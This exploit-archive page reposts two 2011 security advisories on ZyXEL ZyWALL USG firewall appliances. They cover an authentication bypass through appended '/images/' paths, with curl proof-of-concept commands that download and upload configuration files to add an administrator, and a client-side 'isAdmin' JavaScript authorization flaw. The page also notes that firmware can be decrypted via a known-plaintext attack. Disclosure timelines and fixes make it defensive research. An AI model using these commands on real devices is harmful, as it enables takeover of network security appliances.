ZyWALL USG Appliance Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZyWALL USG Appliance Multiple Vulnerabilities
# Published : 2011-05-04
# Author : RedTeam Pentesting
# Previous Title : SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit
# Next Title : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow
			Advisory: Authentication Bypass in Configuration Import and Export of          ZyXEL ZyWALL USG AppliancesUnauthenticated users with access to the management web interface ofcertain ZyXEL ZyWALL USG appliances can download and uploadconfiguration files, that are applied automatically.Details=======Product: ZyXEL USG (Unified Security Gateway) appliances         ZyWALL USG-20         ZyWALL USG-20W         ZyWALL USG-50         ZyWALL USG-100         ZyWALL USG-200         ZyWALL USG-300         ZyWALL USG-1000         ZyWALL USG-1050         ZyWALL USG-2000         Possibly other ZLD-based productsAffected Versions: Firmware Releases before April 25, 2011Fixed Versions: Firmware Releases from or after April 25, 2011Vulnerability Type: Authentication BypassSecurity Risk: highVendor URL: http://www.zyxel.com/Vendor Status: fixed version releasedAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-003Advisory Status: publishedCVE: GENERIC-MAP-NOMATCHCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCHIntroduction============``The ZyWALL USG (Unified Security Gateway) Series is the "thirdgeneration" ZyWALL featuring an all-new platform. It provides greaterperformance protection, as well as a deep packet inspection securitysolution for small businesses to enterprises alike. It embodies aStateful Packet Inspection (SPI) firewall, Anti-Virus, IntrusionDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN(IPSec/SSL/L2TP) in one box. This multilayered security safeguards yourorganization's customer and company records, intellectual property, andcritical resources from external and internal threats.''(From the vendor's homepage)More Details============During a penetration test, a ZyXEL ZyWALL USG appliance was found andtested for security vulnerabilities.  The following sections firstdescribe, how the appliance's filesystem can be extracted from theencrypted firmware upgrade zip files.  Afterwards it is shown, howarbitrary configuration files can be up- and downloaded from theappliance.  This way, a custom user account with a chosen password canbe added to the running appliance without the need of a reboot.Decrypting the ZyWALL Firmware Upgrade Files--------------------------------------------Firmware upgrade files for ZyXEL ZyWALL USG appliances consist of aregularly compressed zip file, which contains, among others, twoencrypted zip files with the main firmware.  For example, the currentfirmware version 2.21(BQD.2) for the ZyWALL USG 20 ("ZyWALL USG20_2.21(BDQ.2)C0.zip") contains the following files:  -rw-r--r-- 1 user user 43116374 Sep 30  2010 221BDQ2C0.bin  -rw-r--r-- 1 user user     7354 Sep 30  2010 221BDQ2C0.conf  -rw-r--r-- 1 user user    28395 Sep 30  2010 221BDQ2C0.db  -rw-r--r-- 1 user user   703402 Oct 12 17:48 221BDQ2C0.pdf  -rw-r--r-- 1 user user  3441664 Sep 30  2010 221BDQ2C0.ri  -rw-r--r-- 1 user user      231 Sep 30  2010 firmware.xmlThe files 221BDQ2C0.bin and 221BDQ2C0.db are encrypted zip files thatrequire a password for decompression.  Listing the contents ispossible:  $ unzip -l 221BDQ2C0.bin  Archive:  221BDQ2C0.bin    Length      Date    Time    Name  ---------  ---------- -----   ----   40075264  2010-09-15 06:32   compress.img          0  2010-09-30 04:48   db/          0  2010-09-30 04:48   db/etc/          0  2010-09-30 04:48   db/etc/zyxel/          0  2010-09-30 04:48   db/etc/zyxel/ftp/          0  2010-09-30 04:48   db/etc/zyxel/ftp/conf/         20  2010-09-14 14:46   db/etc/zyxel/ftp/conf/htm-default.conf       7354  2010-09-14 14:46   db/etc/zyxel/ftp/conf/system-default.conf          0  2010-09-30 04:48   etc_writable/          0  2010-09-30 04:48   etc_writable/budget/          0  2010-09-14 15:08   etc_writable/budget/budget.conf          0  2010-09-15 06:28   etc_writable/firmware-upgraded         81  2010-09-14 15:09   etc_writable/myzyxel_info.conf        243  2010-09-14 15:03   etc_writable/tr069ta.conf          0  2010-09-30 04:48   etc_writable/zyxel/          0  2010-09-30 04:48   etc_writable/zyxel/conf/        996  2010-09-15 06:28   etc_writable/zyxel/conf/__eps_checking_default.xml      42697  2010-09-14 14:46   etc_writable/zyxel/conf/__system_default.xml         95  2010-09-30 04:48   filechecksum       1023  2010-09-30 04:48   filelist        336  2010-09-30 04:48   fwversion         50  2010-09-15 06:34   kernelchecksum    3441664  2010-09-30 04:48   kernelusg20.bin          0  2010-09-14 14:46   wtp_image/  ---------                     -------   43569823                     24 files  $ unzip -l 221BDQ2C0.db  Archive:  221BDQ2C0.db    Length      Date    Time    Name  ---------  ---------- -----   ----          0  2009-07-29 04:44   db_remove_lst          0  2010-09-15 06:28   etc/          0  2010-09-15 06:35   etc/idp/         39  2010-09-14 16:08   etc/idp/all.conf         25  2010-09-14 16:08   etc/idp/attributes.txt        639  2010-09-14 16:08   etc/idp/attributes_self.txt        277  2010-09-14 16:08   etc/idp/device.conf         39  2010-09-14 16:08   etc/idp/dmz.conf         39  2010-09-14 16:08   etc/idp/lan.conf         39  2010-09-14 16:08   etc/idp/none.conf      60581  2010-09-14 16:08   etc/idp/self.ref       5190  2010-09-14 16:08   etc/idp/self.rules          0  2010-09-14 16:08   etc/idp/update.ref          0  2010-09-14 16:08   etc/idp/update.rules         39  2010-09-14 16:08   etc/idp/wan.conf     445075  2010-09-14 16:08   etc/idp/zyxel.ref        327  2010-09-14 16:08   etc/idp/zyxel.rules          0  2010-09-14 16:05   etc/zyxel/          0  2010-09-15 06:35   etc/zyxel/ftp/          0  2010-09-15 06:35   etc/zyxel/ftp/.dha/          0  2010-09-15 06:35   etc/zyxel/ftp/.dha/dha_idp/          0  2010-09-15 06:35   etc/zyxel/ftp/cert/          0  2010-09-15 06:35   etc/zyxel/ftp/cert/trusted/          0  2010-09-15 06:35   etc/zyxel/ftp/conf/         20  2010-09-14 14:46   etc/zyxel/ftp/conf/htm-default.conf       7354  2010-09-14 14:46   etc/zyxel/ftp/conf/system-default.conf          0  2010-09-15 06:35   etc/zyxel/ftp/dev/          0  2010-09-15 06:35   etc/zyxel/ftp/idp/          0  2010-09-15 06:35   etc/zyxel/ftp/packet_trace/          0  2010-09-15 06:35   etc/zyxel/ftp/script/       1256  2010-09-15 06:35   filelist  ---------                     -------     520939                     31 filesDuring a penetration test it was discovered that the file"221BDQ2C0.conf" (from the unencrypted firmware zip file) has exactlythe same size as the file "system-default.conf" contained in eachencrypted zip.  This can be successfully used for a known-plaintextattack[1] against these files, afterwards the decrypted zip-files can beextracted.  However, please note that this attack only allows decryptingthe encrypted zip files, the password used for encrypting the files inthe first place is not revealed.Among others, the following programs implement this attack: * PkCrack by Peter Conrad [2] * Elcomsoft Advanced Archive Password Recovery [3]Afterwards, the file "compress.img" from "221BDQ2C0.bin" can bedecompressed (e.g. by using the program "unsquashfs"), revealing thefilesystem for the appliance.Web-Interface Authentication Bypass-----------------------------------ZyWALL USG appliances can be managed over a web-based administrativeinterface offered by an Apache http server.  The interface requiresauthentication prior to any actions, only some static files can berequested without authentication.A custom Apache module "mod_auth_zyxel.so" implements theauthentication, it is configured in etc/service_conf/httpd.conf in thefirmware (see above). Several Patterns are configured with the directive"AuthZyxelSkipPattern", all URLs matching one of these patterns can beaccessed without authentication:  AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /languageThe administrative interface consists of several programs which arecalled as CGI scripts. For example, accessing the following URL afterlogging in with an admin account delivers the current startupconfiguration file:  https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.confThe Apache httpd in the standard configuration allows appendingarbitrary paths to CGI scripts. The server saves the extra path in theenvironment variable PATH_INFO and executes the CGI script (this can bedisabled by setting "AcceptPathInfo" to "off"[4]). Therefore, appendingthe string "/images/" and requesting the following URL also executes the"export-cgi" script and outputs the current configuration file:  https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.confDuring the penetration test it was discovered that for this URL, noauthentication is necessary (because the string "/images/" is includedin the path-part of the URL) and arbitrary configuration files can bedownloaded. The file "startup-config.conf" can contain sensitive datalike firewall rules and hashes of user passwords. Other interestingconfig-file names are "lastgood.conf" and "systemdefault.conf".The administrative interface furthermore allows uploading ofconfiguration files with the "file_upload-cgi" script.  Applying thesame trick (appending "/images/"), arbitrary configuration files can beuploaded without any authentication.  When the chosen config-file nameis set to "startup-config.conf", the appliance furthermore applies allsettings directly after uploading.  This can be used to add a secondadministrative user with a self-chosen password and take over theappliance.Proof of Concept================The current startup-config.conf file from a ZyWALL USG appliance can bedownloaded by accessing the following URL, e.g. with the program cURL: $ curl --silent -o startup-config.conf /   "https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf"This file can be re-uploaded (e.g. after adding another administrativeuser) with the following command, the parameter "ext-comp-1121" may needto be adjusted: $ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 /   -F "file_path=@startup-config.conf;filename=startup-config.conf" /   https://192.168.0.1/cgi-bin/file_upload-cgi/images/Workaround==========If possible, disable the web-based administrative interface or elseensure that the interface is not exposed to attackers.Fix===Upgrade to a firmware released on or after April 25, 2011.Security Risk=============Any attackers who are able to access the administrative interface ofvulnerable ZyWALL USG appliances can read and write arbitrary configurationfiles, thus compromising the complete appliance.  Therefore the risk isestimated as high.History=======2011-03-07 Vulnerability identified2011-04-06 Customer approved disclosure to vendor2011-04-07 Vendor notified2011-04-07 First reactions of vendor, issue is being investigated2011-04-08 Meeting with vendor2011-04-15 Vulnerability fixed by vendor2011-04-18 Test appliance and beta firmware supplied to           RedTeam Pentesting, fix verified2011-04-25 Vendor released new firmwares with fix2011-04-29 Vendor confirms that other ZLD-based devices may also be           affected2011-05-04 Advisory releasedRedTeam Pentesting likes to thank ZyXEL for the fast response andprofessional collaboration.References==========[1] ftp://utopia.hacktic.nl/pub/crypto/cracking/pkzip.ps.gz[2] http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html[3] http://www.elcomsoft.com/archpr.html[4] http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfoRedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests, short pentests,performed by a team of specialised IT-security experts. Hereby, securityweaknesses in company networks or products are uncovered and can befixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found athttp://www.redteam-pentesting.de.-- RedTeam Pentesting GmbH                    Tel.: +49 241 963-1300Dennewartstr. 25-27                        Fax : +49 241 963-130452068 Aachen                    http://www.redteam-pentesting.de/Germany                         Registergericht: Aachen HRB 14004Gesch盲ftsf眉hrer: Patrick Hof, Jens Liebchen, Claus R. F. OverbeckAdvisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web          InterfaceThe ZyXEL ZyWALL USG appliances perform parts of the authorization fortheir management web interface on the client side using JavaScript. Bysetting the JavaScript variable "isAdmin" to "true", a user with limitedaccess gets full access to the web interface.Details=======Product: ZyXEL USG (Unified Security Gateway) appliances         ZyWALL USG-20         ZyWALL USG-20W         ZyWALL USG-50         ZyWALL USG-100         ZyWALL USG-200         ZyWALL USG-300         ZyWALL USG-1000         ZyWALL USG-1050         ZyWALL USG-2000         Possibly other ZLD-based productsAffected Versions: Firmware Releases before April 25, 2011Fixed Versions: Firmware  Releases from or after April 25, 2011Vulnerability Type: Client Side AuthorizationSecurity Risk: mediumVendor URL: http://www.zyxel.com/Vendor Status: fixed version releasedAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-004Advisory Status: publishedCVE: GENERIC-MAP-NOMATCHCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCHIntroduction============``The ZyWALL USG (Unified Security Gateway) Series is the "thirdgeneration" ZyWALL featuring an all-new platform. It provides greaterperformance protection, as well as a deep packet inspection securitysolution for small businesses to enterprises alike. It embodies aStateful Packet Inspection (SPI) firewall, Anti-Virus, IntrusionDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN(IPSec/SSL/L2TP) in one box. This multilayered security safeguards yourorganization's customer and company records, intellectual property, andcritical resources from external and internal threats.''(From the vendor's homepage)More Details============Users with the role "limited-admin" are allowed to log into theweb-based administrative interface and configure some aspects of aZyWALL USG appliance.  It is usually not possible to download the currentconfiguration file, as this includes the password-hashes of all users.When the "download" button in the File Manager part of the web interfaceis pressed, a JavaScript dialogue window informs the user that thisoperation is not allowed.  However, setting the JavaScript variable"isAdmin" to "true" (e.g. by using the JavaScript console of the"Firebug" extension for the Firefox web browser) disables this check andlets the user download the desired configuration file.  It is alsopossible to directly open the URL that downloads the configuration file.The appliances do not check the users' permissions on the server side.Proof of Concept================After logging into the web interface, set the local JavaScript variable"isAdmin" to "true" and use the File Manager to download configurationfiles.  Alternatively, the current configuration file (including thepassword hashes) can also be downloaded directly by accessing thefollowing URL:  https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.confWorkaround==========If possible, disable the web-based administrative interface or ensureotherwise that the interface is not exposed to attackers.Fix===Upgrade to a firmware released on or after April 25, 2011.Security Risk=============This vulnerability enables users of the role "limited-admin" to accessconfiguration files with potentially sensitive information (like thepassword hashes of all other users).  The risk of this vulnerability isestimated as medium.History=======2011-03-07 Vulnerability identified2011-04-06 Customer approved disclosure to vendor2011-04-07 Vendor notified2011-04-08 Meeting with vendor2011-04-15 Vulnerability fixed by vendor2011-04-18 Test appliance and beta firmware supplied to           RedTeam Pentesting, fix verified2011-04-25 Vendor released new firmwares with fix2011-04-29 Vendor confirms that other ZLD-based devices may also be           affected2011-05-04 Advisory releasedRedTeam Pentesting likes to thank ZyXEL for the fast response andprofessional collaboration.RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests, short pentests,performed by a team of specialised IT-security experts. Hereby, securityweaknesses in company networks or products are uncovered and can befixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found athttp://www.redteam-pentesting.de.-- RedTeam Pentesting GmbH                    Tel.: +49 241 963-1300Dennewartstr. 25-27                        Fax : +49 241 963-130452068 Aachen                    http://www.redteam-pentesting.de/Germany                         Registergericht: Aachen HRB 14004Gesch盲ftsf眉hrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck